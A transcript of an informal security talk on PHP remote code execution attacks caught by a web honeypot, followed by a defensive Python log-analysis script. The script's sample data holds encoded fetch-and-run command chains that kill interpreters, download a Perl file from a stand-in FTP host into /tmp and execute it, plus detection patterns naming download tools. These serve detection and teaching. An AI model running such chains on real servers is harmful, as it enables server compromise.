I have 30 slides to go through, like he does. But they're not going to be anywhere near as interesting. So that's me, the important slide about me. I'm going to be talking about PHP remote code execution, basically that, which I'm sure some of you guys will know about, which makes me excited, because who doesn't love remote code execution? Just me? Wow. Everyone loves it except for the good guys. Except for the bad guys, who love that remote code execution. I did these slides last night and this morning after drinking a bit too much. So if I go a bit off-kilter, you know why.

But I'm mostly interested in PHP remote code execution. And it looks kind of like that, which you can't see, because it's really small text on a shitty background. So let's make that a little bit better. That's what one request looks like, and you should recognize that. Anyone recognize that? Seriously, I expect at least 10 hands. Otherwise, you're all going to buy me beer, except for you, because you always fucking argue with me. OK, that's an Apache log. You can see the POST, the blah, blah, blah, HTTP/1.1, 404, blah, blah, blah. That's what you see in your logs, which is great, because that big blob of text there is encoded text. So we can take that into something like Burp Decoder and decode it. And that really small text that none of you can see is the part that was posted to the Apache logs. It's not really useful to us, so we can't really tell what the stuff is doing, but we know that something bad is going on, because, yeah. So what we do is we look back and we see it's a POST, so we're not going to see anything in the Apache logs. So that's really not much use to us.

So how do we get something useful back? Well, you go to something like Glastopf, which is a really nice web proxy, a web honeypot that a friend of mine wrote. And yes, you have to run it on port 80, blah, blah, blah. But what it does is it will say, I'm vulnerable to this, I'm vulnerable to that, and just take all that data in. So no matter what you throw at it, you'll get stuff. So you can actually check what is contained in that POST data. And I wrote some really shitty code to look at the databases that Glastopf writes, so you can actually then pull out useful data, because I'm great and I've got a good bum.

And what you do get in the POST data is something that looks like that. So that's what you'll see in the actual POST data. So, first line: kill perl, kill php, go into the temp, download some really great file from an FTP site, and then run that FTP site. Who thinks this is a good idea on a web server? Remote code execution, yeah, yeah.

And this is what they download. Again, small text, black background, terrible. This is a Perl DDoS script. We can see that it's going to mask itself as /usr/local/apache/bin/httpd. And we've got the command and control server that it connects back to, along with the IRC channel. So you can actually go in there and be like, hi, I want to control your IRC thing. And then they DDoS you, and then your boss shouts at you.

Here's another one. This was a scraper script. I'm not entirely sure what a scraper script does, but again, the nickname of the bot, thug life, is the authentication. And then this is obviously R&D, because the channel is testing, so it's not really ready to go into QA yet. But we've got, again, a C&C server, blah, blah, blah. Great stuff.

This one was fun. I actually had a great time at CCC last year with the guy. So there were these four, five files that got downloaded. We've got some 386, normal Intel code. We've got some MIPS stuff. We've got some ARM stuff. All kind of doing the same thing. And I'm going to go on a bit of a tangent here, because it made me really hot at the time. I looked at it, and I was like, this has got to be packed or something. It wasn't. I gave it to this guy, and I was like, hey, look at this. It's malware. It's fresh. It's interesting. He's like, mm, either. It's just not packed. It's just really weird encoding, blah, blah, blah. And it was really cool stuff. I then passed out from drinking too much, and I lost my chain of thought. But the cool thing for this is that the detection ratio for those files was about 1 out of 47, 2 out of 47. I'm not entirely sure what they do. I know they're malicious. I just haven't bothered to fire up an ARM or a MIPS machine to run it, because I like to drink beer and sit in the sun and ride bikes. I'm a bad geek.

But this is all great for bad guys. They make bad guys really happy, and good guys like us are really sad. So what can you do to save yourself? Patch your shit. Don't run PHP, preferably, because PHP is shit. Thank you. Boobies. I have samples if anyone wants samples to play with. You know the man in the green.
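The talk walks through three steps by hand: spot the encoded blob in the Apache access log, decode it, and then (for POST bodies, which Apache never logs) pull the data out of what the honeypot captured and look for the kill-interpreters / cd to temp / fetch from FTP / run sequence. The script below is an added example, not code from the talk, from Glastopf, or from the speaker's own tooling: it parses constructed Apache combined-format log lines, percent-decodes the request, and scores both the decoded request and a separately captured POST body against indicator patterns modelled on the behaviour the talk describes. The log lines, the POST body, the `.invalid` hostname and the indicator regexes are all constructed for this example; the two-hit threshold is an assumption chosen to keep a lone semicolon or a lone "ftp" in a URL from alerting.

```python
"""Added example: decode Apache access-log requests and honeypot-captured POST
data and flag the command-injection sequence described in the talk.
All sample data and patterns below are constructed for illustration."""
import re
from urllib.parse import unquote_plus

# Apache combined log format: client, identd, user, [timestamp], "request", status, size, ...
# Only the quoted request line is decoded; the other fields are kept for reporting.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Indicator patterns modelled on the behaviour the talk describes: kill other
# interpreters, move to a temp directory, fetch a file from a remote host, run it.
# The regexes themselves are constructed for this example.
INDICATORS = {
    "kill_interpreters": re.compile(r'\bkill(all)?\b[^;|&]*\b(perl|php)\b', re.I),
    "cd_tmp": re.compile(r'\bcd\s+/(tmp|var/tmp|dev/shm)\b', re.I),
    "remote_fetch": re.compile(r'\b(wget|curl|ftp|lwp-download)\b', re.I),
    "interpreter_exec": re.compile(r'\b(perl|php|sh|bash)\s+\S+', re.I),
    "shell_chaining": re.compile(r'(;|\|\||&&|\|)'),
}


def decode(text):
    """Percent-decode twice: the second pass catches payloads encoded twice."""
    return unquote_plus(unquote_plus(text))


def parse_line(line):
    """Return the fields of one access-log line, or None if it is not combined format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["decoded_uri"] = decode(rec["uri"])
    return rec


def indicators_in(text):
    """Names of the indicator patterns that match already-decoded text."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def analyze_log(lines, min_hits=2):
    """Flag log lines whose decoded request carries at least min_hits indicators."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # not an access-log entry; skip it rather than crash
        hits = indicators_in(rec["decoded_uri"])
        if len(hits) >= min_hits:
            findings.append({"ip": rec["ip"], "method": rec["method"],
                             "status": rec["status"], "hits": hits,
                             "decoded": rec["decoded_uri"]})
    return findings


def analyze_body(body, min_hits=2):
    """Same check for POST data captured by a honeypot such as Glastopf, which the
    Apache access log never records. Returns the indicator names, or [] below threshold."""
    hits = indicators_in(decode(body))
    return hits if len(hits) >= min_hits else []


# Constructed sample data (not real traffic; the host uses the reserved .invalid TLD).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Jan/2013:01:02:03 +0000] "GET /index.php?page=about HTTP/1.1" 200 1532 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Jan/2013:01:02:04 +0000] "POST /index.php?page=%3Bcd%20%2Ftmp%3Bwget%20ftp%3A%2F%2Fftp.example.invalid%2Fx.pl%3Bperl%20x.pl HTTP/1.1" 404 281 "-" "Mozilla/5.0"',
    'garbage line that is not an access-log entry',
]
# A form-encoded POST body as a honeypot would hand it back (constructed).
SAMPLE_BODY = "killall+perl%3Bkillall+php%3Bcd+%2Ftmp%3Bwget+ftp%3A%2F%2Fftp.example.invalid%2Fx.pl%3Bperl+x.pl"

if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['method']} {f['status']} -> {', '.join(f['hits'])}")
        print("   decoded:", f["decoded"])
    print("captured POST body ->", ", ".join(analyze_body(SAMPLE_BODY)))
```

The benign GET scores nothing, the encoded POST request in the log scores on four indicators even though its body is absent, and the honeypot-captured body scores on all five, which is the point the talk makes: the access log alone shows you that something is wrong, the honeypot shows you what.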